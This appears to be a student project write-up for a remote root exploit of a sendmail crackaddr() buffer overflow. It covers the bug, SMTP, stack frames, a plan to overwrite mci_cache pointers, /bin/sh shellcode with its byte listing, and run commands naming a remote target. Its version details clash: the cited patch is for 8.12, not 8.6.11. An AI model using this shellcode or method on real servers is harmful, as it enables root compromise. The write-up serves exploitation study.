/*
 *
 *	BUFFER OVERFLOW VULNERABILITY - SENDMAIL 8.6.11 - SLACKWARE 8.0
 *
 *
 */

Operating System 	: Slackware 8.0
Version 			: Sendmail 8.6.11



SENDMAIL VULNERABILITY:

The buffer overflow vulnerability in sendmail exists in the crackaddr() function in headers.c. By properly constructing the from address string and passing it to the crackaddr function it is possible to overrun the static character buffer defined within this function. This overrun is possible due to the incorrect handling of the <> brackets chars in the from address string.

The skipping mode variable is used to indicate that no more output buffer space remains, and several other variables represent different aspects of the input string. After studying the code, we find that whenever a ‘>’ is encountered the index pointer indicating the limit of the buffer is incremented. On the otherhand when the ‘<’ is encountered it is not decremented. Also the ‘<’ and ‘>’ should match since  checkaddr() checks for this counter match.The lev variables in crackaddr function ensures this.Hence, by using a series of ‘<’ and ‘>’ we found that we could overflow the buffer.
 
 With this in mind, we have explained the basic concepts below and how we were able to get root access.



SENDMAIL FUNCTIONALITY:

Sendmail is a general purpose internetwork email routing facility that supports many kinds of mail-transfer and -delivery methods, including the Simple Mail Transfer Protocol (SMTP) used for email transport over Internet. The sendmail" program listens for connections on port 25.
 


SMTP FORMAT :

HELO sendinghostname
This command initiates the SMTP conversation. The host connecting to the remote SMTP server identifies itself by it's fully qualified DNS host name.

MAIL From:<source email address>
This is the start of an email message. The source email address is what will appear in the "From:" field of the message.

RCPT To:<destination email address>
This identifies the receipient of the email message. This command can be repeated multiple times for a given message in order to deliver a single message to multiple receipients.

DATA
This command signifies that a stream of data, ie the email message body, will follow. The stream of data is terminated by a "." on a line by itself.
 


STACK  AND BUFFER OVERFLOW :
 
The process memory is divided into three regions: Text, Data, and Stack. A stack is a contiguous block of memory containing data. A register called the stack pointer (SP) points to the top of the stack. The bottom of the stack is at a fixed address. Its size is dynamically adjusted by the kernel at run time. A stack frame contains the parameters to a function, its local variables, and the data necessary to recover the previous stack frame, including the value of the instruction pointer at the time of the function call. Accessing a variable at a known distance from SP requires multiple instructions. Consequently, a second register, FP is used.
 


 BEHIND THE SCENE :

 So, from the above it is understood that overflowing the from address field will allow us to get root access. But How? 

 	a. Sendmail(exe) will connect to the Sendmail Port on Remote Machine running Slackware 8.0 and Sendmail 8.6.11.

 	b. Sendmail(exe) will send an email with overflown Buffer From String Field with '< >' greater than the buflimit.

 	c. In Due Course of Time, Exploiting the mci_cache structure's address on memory in Slackware 8/Sendmail 8.6.11 is done by pre-calculating the address by running the binary in debug mode. Eg. ( objdump -t binary )

 	d. Now, with the mci_cache's address in hand, we exploit the buffer (static data buffer) and overwrite the mci_cache's entries to point to a new location where our precious Shell Code is Exploited.

 	e. And in the mci_cache file pointer, Changes are made in :
	 	- static MCI **MciCache pointer value to point to our struct mailer_con_info entry,
		- struct mailer *mci_mailer pointer value from our MCI entry,
		- char *mci_host pointer value from our MCI entry,
		- FILE *mci_out pointer value from our MCI entry,

	f. By this, the sendmail program execution can be arbitrarily changed to any position so that other programs can be run.

	g. Here, Shell Code is Constructed to run /bin/sh to spawn a new root shell for us :) And we play with it via play_with_root_shell ().



 
CONSTRUCTING SHELLCODE :
 
A buffer overflow is the result of stuffing more data into a buffer than it can handle. By means of overflowing the buffer, we can overwrite the return address of the buffer or spawn a shell too.
 
#include <unistd.h> 
 int main() {  
       char *args[2];    
     args[0] = "/bin/sh";   
      args[1] = NULL;      
   execve(args[0], args, NULL);
 }
 

 
PSUEDO ASM CODE :

For the Shell Program above, ASM Code is given below 

jmp short mycall      ; Immediately jump to the call instruction
 
shellcode:
    pop   esi         ; Store the address of "/bin/sh" in ESI
    [...]
 
mycall:
    call  shellcode   ; Push the address of the next byte onto the stack: the next
    db    "/bin/sh"   ;   byte is the beginning of the string "/bin/sh"




DEBUGGING USING NASM AND OBJDMP

We even tried our a code which can output shell code for any executable!

$ nasm -f elf get_shell.asm
$ ojdump -d get_shell.o

get_shell.o:     file format elf32-i386

Disassembly of section .text:

00000000 <shellcode-0x2>:
   0:   eb 18                   jmp    1a <mycall>

00000002 <shellcode>:
   2:   5e                      pop    %esi
   3:   31 c0                   xor    %eax,%eax
   5:   88 46 07                mov    %al,0x7(%esi)
   8:   89 76 08                mov    %esi,0x8(%esi)
   b:   89 46 0c                mov    %eax,0xc(%esi)
   e:   b0 0b                   mov    $0xb,%al
  10:   8d 1e                   lea    (%esi),%ebx
  12:   8d 4e 08                lea    0x8(%esi),%ecx
  15:   8d 56 0c                lea    0xc(%esi),%edx
  18:   cd 80                   int    $0x80

0000001a <mycall>:
  1a:   e8 e3 ff ff ff          call   2 <shellcode>
  1f:   2f                      das    
  20:   62 69 6e                bound  %ebp,0x6e(%ecx)
  23:   2f                      das    
  24:   73 68                   jae    8e <mycall+0x7




RUNNING THE CODE :

	Instructions to run the code :

	Use the Make file attached with the code to run the program.

		make all - to compile code and convert sendmail.c to sendmail(exe)
		make execute - to Execute the code and supply boost to it.


	General run is done by :

		./sendmail -r <remote target ip> -l <local ip> -p <port>


	Make Commands :

		make clean - cleans the files
		make start - starts the sendmail
		make test-sendmail - tests the sendmail config
		make test-email - telnet mail.google.com 25



REFERENCES : 
Sendmail
http://www.ouah.org/LSDsendmail.html
http://flylib.com/books/en/2.294.1.59/1/
http://www.securityfocus.com/bid/6991

Patch :
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.security.cr.patch

Types of Attacks :
http://www.gonullyourself.org/ezines/h0no/h0no.txt
http://www.exploit-db.com/papers/13156/

Shell Code :
http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html
http://www.kernel-panic.it/security/shellcode/shellcode5.html
http://badishi.com/basic-shellcode-example/

Useful Buffer Overflow Links :
http://alitarhini.wordpress.com/2012/01/23/exploit-the-buffer-buffer-overflow-attack/
http://www.eecg.toronto.edu/~lie/Courses/ECE1776-2006/Lectures/Lecture2.pdf
http://insecure.org/stf/smashstack.html
http://www.groar.org/expl/beginner/understanding-bof.html
http://insecure.org/stf/smashstack.html
http://downloads.securityfocus.com/vulnerabilities/exploits/linux86_sendmail.c
http://downloads.securityfocus.com/vulnerabilities/exploits/bysin.c

How to avoid exploits:
http://www.itsec.gov.cn/docs/20090507160032879038.pdf
